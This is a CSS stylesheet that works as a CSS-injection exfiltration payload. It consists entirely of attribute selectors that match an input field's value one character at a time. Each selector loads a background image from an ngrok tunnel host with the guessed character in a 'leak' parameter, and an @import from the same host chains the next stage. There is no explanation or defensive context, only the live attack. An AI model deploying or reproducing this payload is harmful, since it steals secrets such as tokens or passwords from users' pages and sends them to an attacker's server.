@import url("http://bc0a37bcf1d5.ngrok.io/?l=4");
input[value="ov!"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=!&q=0.791190213077706");}
input[value="ov\""] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=\"&q=0.21359292060455637");}
input[value="ov#"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=#&q=0.7965757984099204");}
input[value="ov$"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=$&q=0.08650464163704674");}
input[value="ov%"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=%&q=0.11249805331103713");}
input[value="ov&"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=&&q=0.8847808427669901");}
input[value="ov'"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak='&q=0.9731016768864431");}
input[value="ov("] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=(&q=0.26405211189006184");}
input[value="ov)"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=)&q=0.5102394019116137");}
input[value="ov*"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=*&q=0.002518685358242845");}
input[value="ov+"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=+&q=0.27137520719398167");}
input[value="ov,"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=,&q=0.5806138747285807");}
input[value="ov-"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=-&q=0.3303160672768517");}
input[value="ov."] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=.&q=0.48905609726693644");}
input[value="ov/"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=/&q=0.18817937506740634");}
input[value="ov0"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=0&q=0.6392011552057375");}
input[value="ov1"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=1&q=0.2042996573063729");}
input[value="ov2"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=2&q=0.5331999008878647");}
input[value="ov3"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=3&q=0.5346043964583416");}
input[value="ov4"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=4&q=0.8756286377509264");}
input[value="ov5"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=5&q=0.5150702415934596");}
input[value="ov6"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=6&q=0.27322630566475614");}
input[value="ov7"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=7&q=0.9483411100682737");}
input[value="ov8"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=8&q=0.535892119621745");}
input[value="ov9"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=9&q=0.2748314682327948");}
input[value="ov:"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=:&q=0.6607361221542998");}
input[value="ov;"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=;&q=0.9127117993002214");}
input[value="ov<"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=<&q=0.24200665425381485");}
input[value="ov="] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak==&q=0.7642737118942835");}
input[value="ov>"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=>&q=0.616504838742395");}
input[value="ov?"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=?&q=0.9674288228204444");}
input[value="ov@"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=@&q=0.739633276783314");}
input[value="ovA"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=A&q=0.3654695559100869");}
input[value="ovB"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=B&q=0.7995829640973675");}
input[value="ovC"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=C&q=0.5363052307805323");}
input[value="ovD"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=D&q=0.6564171479184602");}
input[value="ovE"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=E&q=0.09690379658165371");}
input[value="ovF"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=F&q=0.5939009221925273");}
input[value="ovG"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=G&q=0.2704420875918756");}
input[value="ovH"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=H&q=0.5578986575153384");}
input[value="ovI"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=I&q=0.9269707656707526");}
input[value="ovJ"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=J&q=0.19888762771773627");}
input[value="ovK"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=K&q=0.356677176611903");}
input[value="ovL"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=L&q=0.7366724816900194");}
input[value="ovM"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=M&q=0.5264673653695213");}
input[value="ovN"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=N&q=0.8446265543540712");}
input[value="ovO"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=O&q=0.46007175637291775");}
input[value="ovP"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=P&q=0.6561824755310914");}
input[value="ovQ"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=Q&q=0.6623635870346252");}
input[value="ovR"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=R&q=0.9875147547806351");}
input[value="ovS"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=S&q=0.4415385587546552");}
input[value="ovT"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=T&q=0.3243564804240542");}
input[value="ovU"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=U&q=0.004232689963417968");}
input[value="ovV"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=V&q=0.9972527849816419");}
input[value="ovW"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=W&q=0.9864352911559864");}
input[value="ovX"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=X&q=0.7894205075676493");}
input[value="ovY"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=Y&q=0.7157769645296761");}
input[value="ovZ"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=Z&q=0.9398335575364716");}
input[value="ov["] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=[&q=0.8120611061185119");}
input[value="ov\\"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=\\&q=0.9216175053924334");}
input[value="ov]"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=]&q=0.6313020178795872");}
input[value="ov^"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=^&q=0.263404093438417");}
input[value="ov_"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=_&q=0.1058672023334919");}
input[value="ov`"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=`&q=0.5471588106549496");}
input[value="ova"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=a&q=0.3867670340506788");}
input[value="ovb"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=b&q=0.044624951318557926");}
input[value="ovc"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=c&q=0.3298599053425342");}
input[value="ovd"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=d&q=0.7721293553366355");}
input[value="ove"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=e&q=0.8948589047801034");}
input[value="ovf"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=f&q=0.8946993652270852");}
input[value="ovg"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=g&q=0.7813915314069835");}
input[value="ovh"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=h&q=0.842269431390168");}
input[value="ovi"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=i&q=0.4583261810632733");}
input[value="ovj"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=j&q=0.2519862213439914");}
input[value="ovk"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=k&q=0.9844326176046869");}
input[value="ovl"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=l&q=0.9664089398551257");}
input[value="ovm"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=m&q=0.8373152130458066");}
input[value="ovn"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=n&q=0.5010995418110924");}
input[value="ovo"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=o&q=0.6165502126341691");}
input[value="ovp"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=p&q=0.5566869182316536");}
input[value="ovq"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=q&q=0.48545710207512727");}
input[value="ovr"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=r&q=0.25112196296046996");}
input[value="ovs"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=s&q=0.23644722153595055");}
input[value="ovt"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=t&q=0.1430528959922115");}
input[value="ovu"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=u&q=0.7356033544183767");}
input[value="ovv"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=v&q=0.16341965728237806");}
input[value="ovw"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=w&q=0.25553534271277223");}
input[value="ovx"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=x&q=0.8174169510739786");}
input[value="ovy"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=y&q=0.4871980456750651");}
input[value="ovz"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=z&q=0.9052508782331774");}
input[value="ov{"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak={&q=0.9283940203908858");}
input[value="ov|"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=|&q=0.5065354738551404");}
input[value="ov}"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=}&q=0.10977261879865763");}
input[value="ov~"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=~&q=0.45788469439681423");}
input[value="ov"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=&q=0.3695064904801888");}
input[value="ov"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=&q=0.47713070378849287");}
input[value="ov"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=&q=0.10639047397892742");}
input[value="ov"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=&q=0.08154338865642408");}
input[value="ov"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=&q=0.4454434315160323");}
input[value="ov"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=&q=0.39182109839788204");}
input[value="ov"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=&q=0.1837923233947787");}
input[value="ov"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=&q=0.9588472037770766");}
input[value="ov"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=&q=0.06028539269034283");}
input[value="ov"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=&q=0.2736287344473247");}
input[value="ov"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=&q=0.6137402527997691");}
input[value="ov"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=&q=0.7760912855420781");}
input[value="ov"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=&q=0.6797890552603403");}
input[value="ov"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=&q=0.608999836869736");}
input[value="ov"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=&q=0.7051736992970288");}
input[value="ov"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=&q=0.3708104238236105");}
input[value="ov"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=&q=0.3434212263345271");}
input[value="ov"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=&q=0.3023142451833023");}
input[value="ov"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=&q=0.09383074809901815");}
input[value="ov"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=&q=0.9735934644114652");}
input[value="ov"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=&q=0.8002361573384644");}
input[value="ov"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=&q=0.8456960934884166");}
input[value="ov"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=&q=0.2715774911334943");}
input[value="ov"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=&q=0.8692406508122215");}
input[value="ov"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=&q=0.8145507827408325");}
input[value="ov"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=&q=0.9508606168267248");}
input[value="ov"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=&q=0.4357093297355552");}
input[value="ov"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=&q=0.062325645792969286");}
input[value="ov"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=&q=0.3857338232928371");}
input[value="ov"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=&q=0.9448104334851417");}
input[value="ov"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=&q=0.4417746225309087");}
input[value="ov"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=&q=0.29834703410034247");}
input[value="ov"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=&q=0.9505069658996139");}
input[value="ov "] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak= &q=0.2022212100876224");}
input[value="ov¡"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=¡&q=0.9819596573796412");}
input[value="ov¢"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=¢&q=0.7166261588751355");}
input[value="ov£"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=£&q=0.45208093363270474");}
input[value="ov¤"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=¤&q=0.9285584331319623");}
input[value="ov¥"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=¥&q=0.6177561107834255");}
input[value="ov¦"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=¦&q=0.9737056159536908");}
input[value="ov§"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=§&q=0.3268779463544762");}
input[value="ov¨"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=¨&q=0.8715811335277333");}
input[value="ov©"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=©&q=0.9946057576269427");}
input[value="ovª"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=ª&q=0.4980551751634892");}
input[value="ov«"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=«&q=0.19620815846946016");}
input[value="ov¬"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=¬&q=0.10520318081126878");}
input[value="ov­"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=­&q=0.2965740450283929");}
input[value="ov®"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=®&q=0.9567901756625143");}
input[value="ov¯"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=¯&q=0.05622934074691388");}
input[value="ov°"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=°&q=0.017524862511578254");}
input[value="ov±"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=±&q=0.2333614589831865");}
input[value="ov²"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=²&q=0.8322788923255664");}
input[value="ov³"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=³&q=0.2688717455234517");}
input[value="ov´"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=´&q=0.7708838233790749");}
input[value="ovµ"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=µ&q=0.26109263137162664");}
input[value="ov¶"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=¶&q=0.6522221715144025");}
input[value="ov·"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=·&q=0.1123009158303383");}
input[value="ov¸"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=¸&q=0.6723077385562355");}
input[value="ov¹"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=¹&q=0.24321683482056544");}
input[value="ovº"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=º&q=0.14626424478875721");}
input[value="ov»"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=»&q=0.01985355015660395");}
input[value="ov¼"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=¼&q=0.7699111866774515");}
input[value="ov½"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=½&q=0.16713465546405915");}
input[value="ov¾"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=¾&q=0.7778577060503455");}
input[value="ov¿"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=¿&q=0.22698527109411604");}
input[value="ovÀ"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=À&q=0.2562556052549094");}
input[value="ovÁ"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=Á&q=0.2252718604856363");}
input[value="ovÂ"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=Â&q=0.08992044795517184");}
input[value="ovÃ"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=Ã&q=0.373611033023878");}
input[value="ovÄ"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=Ä&q=0.15264772210102717");}
input[value="ovÅ"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=Å&q=0.6296741818580636");}
input[value="ovÆ"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=Æ&q=0.7882000443237116");}
input[value="ovÇ"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=Ç&q=0.012515801569007445");}
input[value="ovÈ"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=È&q=0.9387502037533606");}
input[value="ovÉ"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=É&q=0.4365510483953956");}
input[value="ovÊ"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=Ê&q=0.0679146749121613");}
input[value="ovË"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=Ë&q=0.3433757330958631");}
input[value="ovÌ"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=Ì&q=0.35420672310255585");}
input[value="ovÍ"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=Í&q=0.3172952785250376");}
input[value="ovÎ"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=Î&q=0.7647725723498884");}
input[value="ovÏ"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=Ï&q=0.28152217646388733");}
input[value="ovÐ"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=Ð&q=0.35705912891388514");}
input[value="ovÑ"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=Ñ&q=0.7671341374543439");}
input[value="ovÒ"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=Ò&q=0.47642814593135774");}
input[value="ovÓ"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=Ó&q=0.22159022314617327");}
input[value="ovÔ"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=Ô&q=0.0565455943937756");}
input[value="ovÕ"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=Õ&q=0.7546072138577768");}
input[value="ovÖ"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=Ö&q=0.7300368513456845");}
input[value="ov×"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=×&q=0.641349064178544");}
input[value="ovØ"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=Ø&q=0.5276544858243748");}
input[value="ovÙ"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=Ù&q=0.26898927864388633");}
input[value="ovÚ"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=Ú&q=0.4145219135848295");}
input[value="ovÛ"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=Û&q=0.774828628327763");}
input[value="ovÜ"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=Ü&q=0.2610097113802463");}
input[value="ovÝ"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=Ý&q=0.708880689421816");}
input[value="ovÞ"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=Þ&q=0.9121406672058907");}
input[value="ovß"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=ß&q=0.14197030184354098");}
input[value="ovà"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=à&q=0.33875848822696897");}
input[value="ová"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=á&q=0.5073716125252556");}
input[value="ovâ"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=â&q=0.2227206190657789");}
input[value="ovã"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=ã&q=0.20728080951266126");}
input[value="ovä"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=ä&q=0.29223377296468267");}
input[value="ovå"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=å&q=0.14733041169424932");}
input[value="ovæ"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=æ&q=0.6714227261196415");}
input[value="ovç"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=ç&q=0.7821696109306595");}
input[value="ovè"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=è&q=0.8862164827359735");}
input[value="ové"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=é&q=0.07562816737369649");}
input[value="ovê"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=ê&q=0.703446331461145");}
input[value="ovë"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=ë&q=0.6101201822503401");}
input[value="ovì"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=ì&q=0.01503374841588756");}
input[value="oví"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=í&q=0.33547593038541734");}
input[value="ovî"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=î&q=0.8797666525919843");}
input[value="ovï"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=ï&q=0.6792508508025572");}
input[value="ovð"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=ð&q=0.2949387401096524");}
input[value="ovñ"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=ñ&q=0.08648743804963632");}
input[value="ovò"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=ò&q=0.5986161621386308");}
input[value="ovó"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=ó&q=0.7715731584122634");}
input[value="ovô"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=ô&q=0.08370087659653058");}
input[value="ovõ"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=õ&q=0.7378888948328906");}
input[value="ovö"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=ö&q=0.5652103521021601");}
input[value="ov÷"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=÷&q=0.3300130985871317");}
input[value="ovø"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=ø&q=0.05236499798971672");}
input[value="ovù"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=ù&q=0.7918763336057366");}
input[value="ovú"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=ú&q=0.2761309232134226");}
input[value="ovû"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=û&q=0.9378903464132127");}
input[value="ovü"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=ü&q=0.7628768539785948");}
input[value="ový"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=ý&q=0.5464450961298826");}
input[value="ovþ"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=þ&q=0.08244330130152844");}
input[value="ovÿ"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=ÿ&q=0.9561398399207304");}
